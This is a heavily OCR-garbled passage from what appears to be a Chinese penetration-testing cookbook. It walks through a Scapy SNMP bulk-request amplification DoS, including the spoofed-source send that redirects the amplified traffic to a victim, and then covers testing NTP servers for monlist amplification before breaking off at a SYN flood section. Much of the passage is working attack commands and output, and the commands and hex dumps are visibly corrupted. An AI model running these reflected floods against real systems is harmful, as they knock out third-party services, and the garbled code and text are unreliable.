要 构建 我 们 的 请 求 的 IP 层 ， 我 们 应 该 将 IP ARARE i o MNF 

用 display() 部 数 ， 我 们 可 以 确定 该 对 象 的 属性 配置 。 通 常 ， 发 送 和 接收 地 址 都 
设 为 回 送 地 址 127.0.0.1 。 可 以 通过 将 i.dst 设置 为 广播 地 址 的 字符 串 值 ， 来 
更 改 目 标 地 址 并 修改 这 些 值 。 通 过 再 次 调用 display() 函数 ， 我 们 可 以 看 到 ， 不 
仅 更 新 了 目的 地 址 ， 而 且 Scapy 也 会 自动 将 源 IP 地 址 更 新 为 与 默认 接口 相关 的 地 
址 。 现 在 我 们 已 经 构建 了 请 求 的 IP 层 ， 我 们 应 该 继续 构建 UDP 层 : 


>>> U = UDP() 
>>> u.display() 
###[ UDP ]### 
sport= domain 
dport= domain 
len= None 
chksum= None 


要 构建 我 们 的 请 求 的 UDP 层 ， 我 们 将 使 用 与 |P 层 相同 的 技术 。 在 提供 的 示例 

中 ， UDP HARAT u 变量 。 如 前 所 述 ， 可 以 通过 调用 display() 函数 来 确 

定 默认 配置 。 在 这 里 ， 我 们 可 以 看 到 源 和 目标 端口 的 默认 值 都 列 为 domain 。 您 

可 能 能 猜 到 ， 这 表示 与 端口 53 相关 的 DNS 服 务 。 你 可 能 已 经 猜 到 ， 它 需要 修改 为 
SNMP 相关 的 端口 : 


>>> u.dport = 161 
>>> U,Sport = 161 
>>> u.display() 
###[ UDP ]### 
sport= snmp 
dport= snmp 
len- None 
chksum= None 


要 将 源 端 口 和 目标 端口 更 改 为 SNMP， 应 将 整数 值 161 传递 给 它 ; 此 值 对 应 于 与 服 
务 关 联 的 UDP 端口 。 这 些 更 改 可 以 通过 再 次 调用 display() AAKA o 现在 
已 经 构建 了 IP de UDP 层 ， 我 们 需要 构建 SNMP 层 : 


>>> snmp = SNMP() 
>>> snmp.display() 
###[ SNMP ]### 
version- v2c 
community- 'public' 
NPDUN 
|###[ SNMPget ]### 
| id= 0 
| error= no_error 
| error_index= 0 
| 
\varbindlist\ 


为 了 构建 我 们 的 请 求 的 SNMP 层 ， 我 们 将 使 用 与 IP fe UDP 层 相同 的 技术 。 在 提 
供 的 示例 中 ， SNMP 对 象 已 赋 给 snmp 变量 。 如 前 所 述 ， 可 以 通过 调 
用 display() 函数 来 标识 默认 配置 。 现 在 已 经 构建 了 IP，UDP 和 SNMP E » X 
们 需要 构建 一 个 批量 请 求 来 替换 默认 赋 给 PDU 值 的 sNMPget 请 求 : 


>>> bulk = SNMPbulk() 
>>> bulk.display() 
###[ SNMPbulk ]### 
id= 0 
non_repeaters= 0 
max_repetitions= 0 
\varbindlist\ 


为 了 构建 SNMP 批量 请 求 ， 我 们 将 使 用 与 IP，UDP fe SNMP 层 相 同 的 技术 。 在 
提供 的 示例 中 ，SNMP 批量 请 求 已 赋 给 了 bulk 变量 。 如 前 所 述 ， 可 以 通过 调 
用 display() 函数 来 确认 默认 配置 。 在 这 里 ， 我 们 可 以 看 到 有 几 个 值 需 要 修改 : 


>>> bulk.max repetitions = 50 
>>> bulk.varbindlist-[SNMPvarbind(oid-ASN1 OID('1.3.6.1.2.1.1')) 
,SNMPvarb ind(oid=ASN1_OID('1.3.6.1.2.1.19.1.3'))] 
>>> bulk.display() 
###[ SNMPbulk ]### 

id= 0 

non_repeaters= 0 

max_repetitions= 50 

\varbindlist\ 

|###[ SNMPvarbind ]### 

| oid= <ASN1_0ID['.1.3.6.1.2.1.1']> 

| value= <ASN1_NULL[0]> 

|###[ SNMPvarbind ]### 

| oid= <ASN1_0ID['.1.3.6.1.2.1.19.1.3']> 

| value= <ASN1_NULL[0]> 


SNMP varbindlist 需要 修改 来 包含 查询 的 OID tho th 
外 ，max_repetitions 赋 了 整数 值 为 50。 现 在 批量 请 求 已 配置 完毕 ， 批 量 请 求 
对 象 应 赋 给 SNMP PDU 值 : 


>>> snmp.PDU = bulk 
>>> snmp.display() 
###[ SNMP ]### 
version= v2c 
community- 'public' 
NPDUN 
| ###[ SNMPbulk ]### 
| id= 0 
| non_repeaters= 0 
| max_repetitions= 50 
| \varbindlist\ 
| 
|###[ SNMPvarbind ]### 
| 
| oid= <ASN1_0ID['.1.3.6.1.2.1.1']> 
| 
| value= <ASN1 NULL[O0]» 
| 
|###[ SNMPvarbind ]### 
| 
| oid= <ASN1 0ID['.1.3.6.1.2.1.19.1.3']> 
| 
| 


value= <ASN1_NULL[0]> 


我 们 可 以 通过 调用 display() 函数 来 验证 批量 请 求 是 否 已 赋 给 SNMP PDU 值 。 
现在 已 经 构建 了 IP，UDP 和 SNMP 层 ， 并 且 批 量 请 求 已 经 配置 并 赋 给 SNMP 
Jeo RAT VGA HERR RE RMR: 


>>> request = (i/u/snmp) 
>>> request.display() 
###[ IP ]### 

version= 4 


ihl= None 
tos= 0x0 
len= None 
id= 1 
flags= 
frag- 0 
ttl= 64 
proto= udp 


chksum= None 
src= 172.16.36.224 
dst= 172.16.36.134 
\options\ 
###[ UDP ]### 
sport= snmp 
dport= snmp 
len- None 
chksum- None 
###[ SNMP ]### 
version= v2c 
community- 'public' 


\PDU\ 
|###[ SNMPbulk ]### 
| id= 0 


| non repeaters- 0 

| max repetitions- 50 

| \varbindlist\ 

| 

|###[ SNMPvarbind ]### 

| 

| oid- <ASN1_OID['.1.3.6.1.2.1.1']> 

| 

| value= «ASN1 NULL[O0]» 

| 

|###[ SNMPvarbind ]### 

| 

| oid= <ASN1_0ID['.1.3.6.1.2.1.19.1.3']> 
| 
| 


value= <ASN1_NULL[0]> 


"T VA38 3d 4$ F| AL 2H R8 ES RHE IP > UDP fe SNMP Bo 然后 可 以 将 这 些 层 赋 给 
示 整 个 请 求 的 新 变量 。 然后 可 以 调用 display() 函数 来 查看 请 求 的 配置 。 一 
建立 了 请 求 ， 就 可 以 将 其 传递 给 发 送 和 接收 函数 ， 以 便 我 们 可 以 分 析 响 应 : 


>>> ans = sri(request, verbose=1, timeout-5) 
Begin emission: 
Finished to send 1 packets. 


Received 1 packets, got 1 answers, remaining © packets 
>>> ans.display() 


###[ IP ]### 
version= 4L 
ihl= 5L 
tos= 0x0 
len= 1500 
id= 27527 
flags= MF 
frag- OL 
ttl- 128 
proto- udp 
chksum- 0x803 
src= 172.16.36.134 
dst- 172.16.36.224 
NoptionsN 
###[ UDP ]### 
sport= snmp 
dport= snmp 
len= 2161 
chksum= Oxdcbf 
###[ Raw ]### 
load- '0\x82\x08e\x02\x01\x01\x04\x06public\xa2\x82\x08V\x0 
2N xO1\xOO\xXO2\xO1\xO0\x02\x01\xO00\x82\xO8IO\X81\xX8b\x06\x08+\x 
O6\xO1\xO2\ x01\x01\x01\x00\x04\x7fHardware: x86 Family 6 Model 
58 Stepping 9 AT/AT COMPATIBLE - Software: Windows 2000 Version 
5.1 (Build 2600 Uniprocessor Free)O\x10\x06\t+\x06\x01\x02\x01\x 
19Nx01Nx01Nx00CNx03pNxf f 20NX18NX06N. X084 NXO6NX01NX02NX01NX01NX02 
NX90NXO6NXOCTNXO6NXO1NX04NX01NX827NXO01NXO01N. X93NX01NX010NX15NX06 
NE-NX06NX01NX02NX01NX19NX01NX02NX90NX04NX08NXO07NXdeN. X92NX19NX08 
NENX1dNX030NXOf NX96NX080-NX06NX01NX02NX01NX01NX03NXO00CNX030N. x8e\ 
x8agNxOeNxO6Nt-NX06NX01NX02NX01NX19NX01NX03NX00NX02NX01NX090NXxOc 
\ X096NX084-NX06NX01NX02NX01NX01NXO4NXO00NXO04NX000NrCNXG6Nt-NX06NX01. 
NX02NXO01N. X19NX01NX04NX09NXO04NX009NX1bNX06NX08--NX06NX01NX02NX01N 
X01NX05Nx00NX04N. xOFDEMO-72E8F41CA40\x0e\xO6\t+\xO6\xXO1\xO2\x01\ 
X19NXx01NXx05Nx0O0BNX01Nx020N. X9CNXO06NX08-4-NXO06NX01NX02NX01NX01NX06N 
X00Nx04Nx000NxOeNxO6Nt-NX06NX01N. Xx02NX01NXx19NX01NX06NXO0BNX01/0N 
FNX06NX084-NX06NX01NX02NX01NX01NX07NX00N. X02NXO1LONXOeNXOGNt-TNX06 
NX01NX02NX01NX19NX01NX07NX00NX02NX01NX000NrFNXO6N. x08+\x06\x01\xO0 
2NX01NX02NX01NXO00NX02NX01NX020NX10NXOG6Nt-7NXO6NXO1NX02NXO1N. X19NX 
92Nx02Nx0ONx02NxO3NxAf NxfdNxfGONXxOf NxG6Nn-NX06NX01NXx02NX01NX02NX 
02\ xO01Nx01Nx01Nx02NXx01Nx010Nx10NXx06NxOb--NXx06NXx01Nx02NX01NX19NXx0 
2NX03NX01N XxO01NX01NX02NX01NX010NXOf NXG6Nn-NX06NXx01NXx02NX01NX02NX 
02\x01\x01\x02\x02\ xO1\xO20\x1LO\xO6\xOb+\xO6\xO1\xXO2\xO1\xK19\xO 
2NX03NX01Nx01NXx02Nx02NXx01N. x020 ( Nx06Nn*NX06NX01NXx02NX01NX02NX02N 
X01Nx02Nx01Nx04Nx1aMS TCP Loopback interface\x000\x10\x06\x0b+\x 
O06\xXO1\x02\x01\x19\x02\x03\x01\x01\x03\x02\x01\x030P\x0O6\NnN+\x06\ 
x01\x02\x01\x02\x02\x01\x02\x02\xX04BAMD PCNET Family PCI Etherne 


t Adapter - Packet Scheduler MiniportNx000Nx10Nx06NxOb-*Nx06N. x01 
NX02NX01NX19NX02NX03NXx01NX01NX04NX02NX01NX040NXOf NXG6Nn*-NX06NX01. 
NX02N. X01NX02NX02NXO01NX03NX01NX02NX01NX180NXx10NXx06NXx0b--NX06NX01N 
X02NX01Nx19N xO2\xO3\xXO1\xXO1\xXO5\xO2\xO1\xO50\xOF\xXO6\N+\xXO6\xXO1 
NX02NX01NX02NX02NX01N. X93NX02NX02NXx01NXx060NXx18NXx06Nx0b--NX06NX01N 
X02NX01Nx19Nx02NX03NXx01NX02N. XO1NXOG6Nt-4-NXO6NXO1NX02NX01NX19NX02N 
X01Nx0509Nx10Nx06Nn-NX06NX01NX02NX01N. X02NX02NX01NX04NX01NX02NX02 
NXO5NXfG90NX18NXO06NXODTNXO6NXO1NX02NXO1NX19N. X92NX03NX01NX02NX02N 
X06Nt-NXx06NX01NX02NX01NX19NX02NX01NX040NX10NXO06Nn*N. X06NX01NX02N 
XO1\xX02\x02\xO1\xO4\xO2\xO2\xO2\xO5\xdcO\x18\xO6\xOb+\x06\ xO1\x 
92Nx01Nx19Nx02NX03NX01NX02NXO03NXO6Nt-NX06NXO1NX02NX01NX19NX02NX0O 
1\ x070Nx12Nx06NnT NX06NX01NX02NX01NX02NX02NX01NX05NX01BNX04NX00N 
X98Nx96N x800NXx18NX06Nx0b--NXO6NX01NX02NX01NX19NXx02NX03NXx01NX02NX 
O4\xO6\E+\xXO6\ X01NX02NXO01NX19NX02NX01NX030NX12NX06Nn* NX06NX01NX 
02\x01\x02\x02\x01\x05\ x02B\x04; \x9a\xca\xO00\x18\x06\x0b+\x06\ 
XO1\xXO2\xXO1\XL9\XO2\xO3\xXO1\xXO2\ x0O5\x0O6\t+\x06\x01\x02\x01\x19\ 
X02Nx01Nx020NxOeNx06Nn-NX06NX01NX02NX01N. xXO2\xO2\x01\x06\x01\x04 
\x000\x12\x06\xObD+\xO6\xXO1\xO2\xO1\xK19\xO2\xO3\ X01NX03NX01NX04N 
X03A : NNONX14NX06Nn-NX06NX01NX02NX01NX02NX02NX01NX06NX02N. X04NX06 
NX00Nx0c )\x18\x11\xfb01\x06\x0b+\x06\x01\x02\x01\x19\x02\x03\x01 
\ X03NX02Nx04"C:NN Label: Serial Number 5838200b0\xOf\x06\n+\xO 
6NX01Nx02N x01Nx02Nx02NX01NX07NX01NX02NX01NX010NX12NX06NXOb--Nx06 
NXO01NX02NXO01NX19N. X902NX03NX01NX03NX03NXx04NX03D : \\O\XOF\xO6\N+\xO 
6NX01Nx02NX01NXx02NX02NX01N. X07NX02NX02NX01NX010Nx1dNXx06Nx0Ob--Nx06 
NX01NX02NX01NX19NX02NX03NX01NXx03N. x04\x04\x0eVirtual MemoryONxOf 
NX96Nn- NX06NX01NX02NX01NX02NX02NX01NX08N. X01NX02NX01NX010Nx1eNXxO 
6NxOb--NX06NX01NX02NX01NX19NX02NX03NX01NX03NX05N. x04\xOfPhysical 

MemoryONxOf Nx06Nn-NX06NX01NX02NXx01NXx02NX02NX01NX08NX02N. xO2\x01\ 
X010NXx10NXx06Nx0b-NX96NX01NX02NX01NX19NX02NX03NX01NX04NX01NX02N. X 
9Q1Nx00ONxOf NxO6NnT-NXO6NXO1NX02NX01NX02NX02NXO1NtNXO1CNX01NX000NX 
11Nx06N xOb-NXx06Nx01NXx02NXx01NXx19NX02NX03NX01NX04NX02NX02NX02NX10 
\xOOO\X11\x06\ n-NX96NX01NX02NX01NX02NX02NX014Nt NX02CNx93mNxbb00N 
X10Nx06NxO0b-NX06NXx01N. X02NX01NX19NXx02NX03NXx01NXx04NX03NX02NX01NX0O 
OO\X1L2\xO6\N+\xO6\xXO1\xXO2\xXO1\ xO2\xO2\xO1\N\XO1A\x04\x05\xcb\xd 
6MO\X12\xO6\xXObD+\xO6\xXO1\xXO2\xXO1\xX19\ X92NX03NX01NX04NX04NX02NX0 
3\x01\x00\xOOO\XK11\x06\nN+\xXO6\XO1\XO2\xO1\xO2\ xO2\xO1\N\xO2A\xO 
3\x06\xb1\xa8O0\x12\x06\xOb+\xXO6\xXO1\xXO2\xO1\X19\xO2\xO03\ x01\x04 
\xO5\x02\xO03\xO01\xXOO\xOOO\X11\xXO6\N+\XO6\XO1\XO2\xXO1\xKO2\xO02\x01 
\ XOb\XOLA\XO3\FR\X920\x10\xO6\xOD+\xO6\xXO1\xO2\xO01\xK19\xO2\x03\ 
XO1\xO05\ xO01\xO02\x01\xO00\xX1LO\XO6\N+\XO6\XO1\KO2\xXO1\xXO2\xO2\x01 
NXObDNXO2ANXO2NXOCN. xFfeO\x13\xO6\xOb+\xO6\xXO1\xXO2\xO1\X19\xO2\x03 
\xO1\x05\x02\x02\x04\x00\ x9f Nxf 6a0NXOf NXG6Nn-NX06NXx01NX02NX01NX 
92Nx02NXO1NXOCNXO1ANXO1NX000NX10N. x06NxOb--NXx06NXx01Nx02NX01NX19NX 
02\x03\x01\x05\x03\x02\x01\x000' 


响应 确认 了 我 们 已 经 成 功 构建 了 所 需 请 求 ， 并 且 与 最 初生 成 的 相对 较 小 请 求 相 比 ， 
已 经 请 求 了 相当 大 的 载荷 。 与 之 相似 ， 整 个 过 程 可 以 使 用 Scapy 中 的 单个 命令 来 
执行 。 此 命令 使 用 所 有 与 上 一 个 练习 中 讨论 的 相同 的 值 : 


>>> sri(IP(dst="172.16.36.134")/UDP(sport=161, dport=161)/ SNMP(P 
DU-SNMPbulk(max repetitions-50,varbindlist-[SNMPvarbind(oid-ASN1 


.0D('1.3.6.1.2.1.1')), SNMPvarbind(oid-ASN1 OID('1.3.6.1.2.1.19.1 
.3'))])),ve rbose=1, timeout-5) 


Begin emission: Finished to send 1 packets. 


«IP version-4L ihl-5L tos-OxO len-1500 id-14170 flags=MF frag=0 
L ttl1-128 proto-udp chksum=0x3c30 src-172.16.36.134 dst-172.16.3 
6.224 options-[] |<UDP sport=snmp dport-snmp len-2162 chksum=0x 
d961 |«Raw load='O\x82\ x08fNx02Nx01Nx01Nx04Nx06publicNxa2Nx82N 
X08WNX02NX01NX00Nx02NX01NXx00N. X02NXx01NXx000NXx82Nx08 JONX81NX8bNX06 
NX084-NX06NX01NX02NX01NX01NXx01Nx00N. x04Nx7fHardware: x86 Family 6 
Model 58 Stepping 9 AT/AT COMPATIBLE - Software: Windows 2000 V 
ersion 5.1 (Build 2600 Uniprocessor Free)ONx11N x06\t+\x06\x01\x 
O2\xO1\x19\xO1\xO1\xOO0C\xXO4\x00\xa3i\xadO\x18\xO6\x08+\ X06NX01N 
X02NX01Nx01Nx02NXx00NXx06NxOc*NX06NX01NX04NX01NX827NXO1NXO1NX03N. x 
Q1Nx010Nx15NXxO0G6Nt-NXO6NXO1NX02NXO1NX19NX01NX02NX00NX04NX08NX07NX 
deNx02N x19\t\x08! NXO10NXOfNXG6NX08-0-NX06NX01NX02NX01NX01NX03NX00 
CNXOS3tNXx99Nx180N. xOeNxO6Nt-NXG6NX01NX02NX01NX19NX01NX03NX00NX02N 
XO1\xOOO\XOC\XO6\xXO8+\ X96NXO01NX02NXO01NX01NX04NX00NXx04NXx000Nr NX 
6Nt-NX06NXO01NX02NXO1NX19NX0O1N. x04\x00\xX04\x000\x1b\x06\x08+\x06\ 
XO01\x02\x01\xXO01\x05\xO0\x04\xOFDEMO7 2E8F41CA40\x0e\xO6\t+\x06\xO 
1NX02NX01NX19NX01NXO5NXOGBNXO1NX020NXOCNXO6N. x08+\xO6\xO1\x02\xO0 
1\x01\x06\x00\x04\x000\xO0eE\XO6\T+\XO6\XOL\XO2\xO1\ x19\xO1\xO6\x 
OOB\xX01/0\r\xO06\x08+\xO06\xO1\xO2\xO1\xO1\xXO7\xXOO\xXO2\xO1LO\ xOe\ 
X06Nt-NXx06NXx01NX02NX01NX19NX01NX07NXO00NX02NX01NXx009Nr NX96NX08-NX 
O6\ x01Nx02Nx01NXx02NX01NX00NX02NX01NX020NX10NXG6N t -NX06NX01NX02N 
X01Nx19Nx02N X02NX00Nx02NxO3NxA1f NxfaNxfOONxOf NxOG6NnT-NX06NX01NX02 
NX01NX02NX02NX01NX01N. X01NX02NX01NXx010NX10NXx06Nx0b--NX06NX01NX02N 
X01NXx19Nx02NX03NXx01NX01NX01N xO2\xO1\xOLO\XOF\xO6\N+\xO6\x01\x02 
NX01NX02NX02NX01NX01NX02NX02NX01NX020N. X10Nx06Nx0b--NX06NX01NX02N 
X01NX19Nx02NXx03NXx01NXx01NXx02NX02NX01NX020 (NX06N. n+\xO06\x01\x02\xO 
1\x02\x02\x01\x02\x01\x04\x1aMS TCP Loopback interfaceN x000Nx10 
\x06\xObD+\xO6\xO1\xXO02\xXO01\xX19\xXO2\xO3\xO1\xO1\xO3\xXO2\xO1\xO30P\ 
X06Nn*-NXx06NX01NXx02NX01NX02NX02NX01NX02NX02Nx04BAMD PCNET Family 
PCI Ethernet Adapter - Packet Scheduler Miniport\x000\x10\x06\x 
Ob-NXx06Nx01N X02NXx01NXx19Nx02NX03NXx01NXx01NXx04NX02NX01NX040NXOfT NXO 
6Nn-NX06NX01NX02NXO1N. X02NX02NXO01NX03NX01NX02NX01NX180NX10NX06NX 
Ob+\xO6\xXO1\xXO2\xO1\xX19\xO2\ XO3NXO1NXO1NX05NX02NX01NXO050NXOfTNX0O 
6Nn-NX06NX01NX02NX01NX02NX02NXO01NX0O3N. X02NX02NX01NX060NX18NX06NX 
Ob-NXx06NXx01NXx02NX01NXx19NX02NX03NX01NX02NX01N. X96Nt-NX06NX01NX02N 
X01NXx19Nx02NXx01Nx050Nx10Nx06NnTNXO06NX01NX02NXO01NX02N. X92NX01NX04 
NX01NX02NX02NXO05NXf 90NX18NX06NXx0b-NX06NX01NX02NX01NX19NX02N. X03N 
X01Nx02Nx02NX06Nt-NXO06NX01NX02NX01NX19NX02NX01NX040NX10NX06NnNX 
O6\ x01Nx02NXx01NXx02NXx02NX01NX04NX02NX02NX02NXO5NxdcONX18NX06NXx0Ob 
TNX06NX01N. X02NX01NX19NX02NX03NX01NX02NXO03NX06N t--NXX96NX01NX02NX0 
1NX19NX02NX01NX070N. Xx12Nx06Nn*-NXO6NXO1NX02NX01NXx02NX02NX01NX05NX 
O1BNXx04NXOONX98NX96NX800N. Xx18NXx06Nx0b--NX06NX01NXx02NXx01NX19NXx02NX 
Q3Nx01Nx02NX0A4NXOG6Nt-NXO6NXO1NX02N. X01NX19NX02NXx01NXx030NX12NX06N 
n-NX06Nx01Nx02NXx01NX02NX02NX01NX05NX02BN. x04; \x9a\xca\x000\x18\x 
Q6NxOb-NXx06NXx01NXx02NX01NX19NX02NX03NX01NX02NXO05N. xO6\t+\XO6\XO1\ 
X02Nx01Nx19Nx02Nx01Nx020NxOQeNxOG6Nn9-NXO6NXO1NX02NX01NX02N. X02NX01. 
NX96NX01NX04NX090NX12NX06NXO0b-NXO06NX01NX02NX01NX19NX02NX03NX01N 
X03Nx01NXx04NX03A : NNONX14NX06NnTNXO6NX01NX02NX01NX02NX02NX01NX06N 


X02Nx04N  x06Nx00NxOc )Nx18Nx11NxfbO1NXx06Nx0b--Nx06NXx01NXx02NXx01NXx19 
NX02NX03NX01NX03NX02NX04" C: NN Label: Serial Number 5838200b0\x0 
F\xO6\n+\xO6\xXO1\xXO2\xO1\ X02NX02NX01NXx07NX01NX02NX01NX010NX12NX 
Q6NxOb-NXx06NXx01NXx02NX01NX19NX02N. XO3NXO1NX03NX03NX04NXO3D : NNONXO 
fNXx06Nn*-NX06NX01NX02NX01NX02NX02NX01NX07N. X02NX02NX01NXx010Nx1d Nx 
9Q6NxOb-NXx06Nx01Nx02NX01NXx19NX02NX03NX01NX03NX04N. x04\x0eVirtual 

MemoryONxOf Nx06Nn-NX06NX01NXx02NXx01NXx02NxX02NX01NX08NX0O1N. xO2\x01\ 
Xx010Nx1eNx06Nx0b-NX96NX01NX02NX01NX19NX02NX03NX01NX03NX05NX04N. x 
OfPhysical MemoryONxOfNxO6Nn*NX06NX01NX02NX01NX02NX02NX01NX08NX0 
2NX02N x01Nx010Nx10Nx06NxOb--NXx06NX01NX02NX01NX19NX02NX03NX01NX04 
NX01NX02NX01N. X990NXOf NXG6Nn-NX06NX01NX02NX01NX02NX02NXO1Nt NX01C 
NX01NX090NX11NX06NXObTN. X096NX01NX02NX01NX19NX02NX03NX01NX04NX02N 
X02Nx02Nx10Nx0009Nx11Nx06Nn-NX06N. xXO1NX02NX01NX02NX02NXO01Nt NX02CN 
XO3m\xbbOO\x1O\xO6\xOb+\xXO6\XO1\xXO2\xO1\ X19NX02NX03NX01NX04NX03 
NX02NX01NX0990NX12NX096Nn* NX06NX01NX02NX01NX02NX02N. xO1NnNX01ANX0A 
NX080B. ONX12NX06Nx0b--NX06NX01NX02NX01NX19NX02NX03NX01NX04N. X04NX 
9Q2Nx03Nx01Nx0ONx0GOONx11Nx06Nn*-NXO6NXO1NX02NX01NX02NX02Nx01NnNX02 
AN xO03NrIeGNX12NX06NXxO0b- NX06NX01NX02NX01NX19NX02NX03NX01NX04NX05 
\xO2\x03\ X01NX90NX090Nx11NX06Nn* NX06NXx01NX02NX01NX02NX02NX01NX0O 
b\x01A\x03\x13\x14\ xdeQGNx10NXx06Nx0b--NX96NX01NX02NX01NX19NXx02NXx0 
3NX01NXG5NXO1NX02NXO1NX0090N. x10Nx86Nn-NX0O6NX01NX02NX01NX02NX02NX 
Q1NXxObNx02ANXO2Nx1eNxc10Nx13Nx06N. x0b-NX06NXx01NXx02NXx01NXx19NX02NX 
O3\xO1\xO5\xO2\xO2\x04\xOO\x9F\XF6aO\XOF\ x96Nn-NXO6NX01NX02NX01. 
NX02NX02NXO01NXOCNXO0O1ANXO1NX000NX10NXO06NXODNXO06N. xO1\xO2\x01\x19 
\x02\x03\x01\x05\x03\x02\xO01\x00!' |>>> 


为 了 实际 将 此 命令 用 作 攻 击 ， 源 IP 地 址 需要 更 改 为 目标 系统 的 IP 地 址 。 这 样 ， 我 
们 应 该 能 够 将 载荷 重 定向 给 那个 受害 者 。 这 可 以 通过 将 IP src 值 更 改 为 目标 IP 
地 址 的 字符 串 来 完成 : 


>>> send(IP(dst="172.16.36.134", src="172.16.36.135")/ UDP(sport- 
161,dport-161)/SNMP(PDU-SNMPbulk(max repetitions-50,varbindlist 
=[SNMPvarbind(oid=ASN1_OID('1.3.6.1.2.1.1')),SNMPvarbind(oid=ASN 
1 OID('1. 3.6.1.2.1.19.1.3'))])),verbose=1, count=2) 


Sent 2 packets. 


send() 函数 应 该 用 于 发 送 这 些 伪造 请 求 ， 因 为 响应 返回 预期 不 会 给 本 地 接口 。 
要 确认 载荷 是 否 到 达 目 标 系 统 ， 可 以 使 用 TCPdump 捕获 传 入 流量 : 


adminQubuntu:-$ sudo tcpdump -i ethO -vv src 172.16.36.134 
tcpdump: listening on ethO, link-type EN10MB (Ethernet), capture 
size 96 bytes 

13:32:14.210732 IP (tos OxO, ttl 128, id 5944, offset 0, flags [ 

+], proto UDP (17), length 1500) 172.16.36.134.snmp > 172.16.36. 

135.snmp: [leni468<asnlen2150] 

13:32:14.210732 IP (tos OxO, ttl 128, id 5944, offset 1480, flag 
s [none], proto UDP (17), length 702) 172.16.36.134 » 172.16.36. 

135: udp 

13:32:35.133384 IP (tos Ox0, ttl 128, id 8209, offset 0, flags [ 

+], proto UDP (17), length 1500) 172.16.36.134.snmp > 172.16.36. 

135.snmp: [leni468<asnlen2150] 

13:32:35.133384 IP (tos OxO, ttl 128, id 8209, offset 1480, flag 
s [none], proto UDP (17), length 702) 172.16.36.134 > 172.16.36. 

135: udp 


4 packets captured 
4 packets received by filter 
© packets dropped by kernel 


在 所 提供 的 示例 中 ，TCPdump 配置 为 捕获 etho 接口 上 ， 来 自 源 IP 地 
dE 172.16.36.134 (SNMP 主机 的 I|P 地 址 ) 的 流量 。 


工作 原理 


放大 攻击 的 原理 是 利用 第 三 方 设备 ， 使 网 络 流量 压倒 目标 。 对 于 多 数 放 大 攻击 ， 必 
须 满足 两 个 条 件 : 


e 用 于 执行 攻击 的 协议 不 验证 请 求 源 
e A A PAK AY 9] 2-77] f & 8] "i ke o2 应 该 显 着 大 于 用 于 请 求 它 的 请 求 。 


SNMP 放大 攻击 的 效率 取决 于 SNMP 查询 的 响应 大 小 。 另 外 ， 可 以 通过 使 用 多 个 
SNMP 服务 器 来 增加 攻击 的 威力 。 


6.6 NTP 放大 DoS 攻击 


NTP 放大 DoS 攻击 利用 响应 远程 monlist 请 求 的 网 络 时 间 协 议 (NTP) 服务 器 。 
monlist 函数 返回 与 服务 器 交互 的 所 有 设备 的 列表 ， 在 某 些 情况 下 最 多 达 600 个 列 
表 。 攻击 者 可 以 伪造 来 自 目 标 IP 地 址 的 请 求 ， 并 且 漏 洞 服 务 器 将 为 每 个 发 送 的 请 
求 返回 非常 大 的 响应 。 在 写 这 本 书 的 时 候 ， 这 仍然 是 一 个 常见 的 威胁 ， 目 前 正在 大 
规模 使 用 。 因此 ， 我 将 仅 演 示 如 何 测 试 NTP 服务器， 以 确定 它们 是 否 将 响应 远程 
monlist 请 求 。 补丁 程 序 可 用 于 大 多 数 NTP 服务 来 解决 此 问题 ， 并 且 任 何 有 存在 漏 
洞 的 设备 应 该 修复 或 下 线 。 


准备 


为 了 确定 是 否 可 以 利用 NTP 服务 器 执行 NTP 放大 攻击 ， 你 需要 有 启用 NTP 的 设 
oe 在 提供 的 示例 中 ，Ubuntu 用 于 托管 NTP 服务 Ubuntu 的 更 多 信 
息 ， 请 参阅 本 书 第 一 章 中 的 “安装 Ubuntu eer i 


TE 3 


为 了 确定 远程 服务 器 是 否 运行 Moe enu. Ras 速 扫描 UDP 3$ v9 123» 
-SU 选项 可 用 于 指定 UDP， 然 后 可 使 用 -p 选项 来 指定 端口 : 


root@KaliLinux:~# nmap -SU 172.16.36.224 -p 123 


Starting Nmap 6.25 ( http://nmap.org ) at 2014-02-24 18:12 EST 
Nmap scan report for 172.16.36.224 

Host is up (0.00068s latency). 

PORT STATE SERVICE 

123/udp open ntp 

MAC Address: 00:0C:29:09:C3:79 (VMware) 


Nmap done: 1 IP address (1 host up) scanned in 0.10 seconds 


fe RAGA 器 上 运行 NTP 服务 ， 则 扫描 应 返回 打开 状态 。Kali Linux 上 默认 安 
装 的 另 一 个 工具 可 用 于 确定 DU "E 务 是 否 可 用 于 放大 攻击 。NTPDC 工具 可 用 于 
尝试 对 远程 服务 执行 monlist 命 


root@KaliLinux:~# ntpdc -n -c monlist 172.16.36.224 
172.16.36.224: timed out, nothing received 
***Request timed out 


理想 情况 下 ， 我 们 希 ZAH] 的 是 没有 响应 返回 。 在 所 提供 的 第 一 个 示例 中 ， 请 求 超 
时 ， 并 且 未 接收 到 输出 。 这 表明 服务 器 不 易 受 攻击 ， 并 且 monlist 命令 只 能 在 本 地 
执行 : 


root@KaliLinux:~# ntpdc -c monlist 172.16.36.3 
remote address port local address count m ver rstr 
avgint lstint 


host.crossing.com 123 172.16.36.3 1844 1d0 
35 1 

grub.ca.us.roller.o 123 172.16.36.3 1744 1d0 
37 S5 

va-time.utility.o 123 172.16.36.3 1744 1d0 
37 59 

cheezpuff .meatball.n 129 1/2216. 3623 1744 1d0 
38 62 

pwnbox.lizard.com 123 172.16.36.3 35 4 4 5d0 


65 51 


或 者 ， 如 果 返 回 了 一 系列 主机 和 连接 元 数据 ， 则 远程 服务 器 可 能 能 够 用 于 放大 攻 
击 。 对 于 与 服务 器 交互 的 每 个 新 主机 ， 会 在 此 列表 中 添加 一 个 新 条 目 ， 响 应 的 大 小 
以 及 可 能 的 载荷 会 变 得 更 大 。 


放大 攻击 的 原理 是 利用 第 三 方 设备 ， 使 网 络 流量 压倒 目标 。 对 于 多 数 放大 攻击 ， 必 
须 满 足 两 个 条 件 : 


e 用 于 执行 攻击 的 协议 不 验证 请 求 源 
e 来 自 所 使 用 的 网 络 功能 的 响应 应 该 显 着 大 于 用 于 请 求 它 的 请 求 。 


NTP 放大 攻击 的 效率 取决 于 NTP 查询 的 响应 大 小 。 另外 ， 可 以 通过 使 用 多 个 NTP 
服务 器 来 增加 攻击 的 威力 。 


6.7 SYN 2# DoS 攻击 


SYN i£ 3 DoS 攻 击 是 一 种 资源 消耗 攻击 。 它 的 原理 是 向 作为 攻击 目标 的 服务 相关 
的 远程 端口 发 送 大 量 TCP SYN 请 求 。 对 于 目标 服务 接收 的 每 个 初始 SYN 分 组 ， 
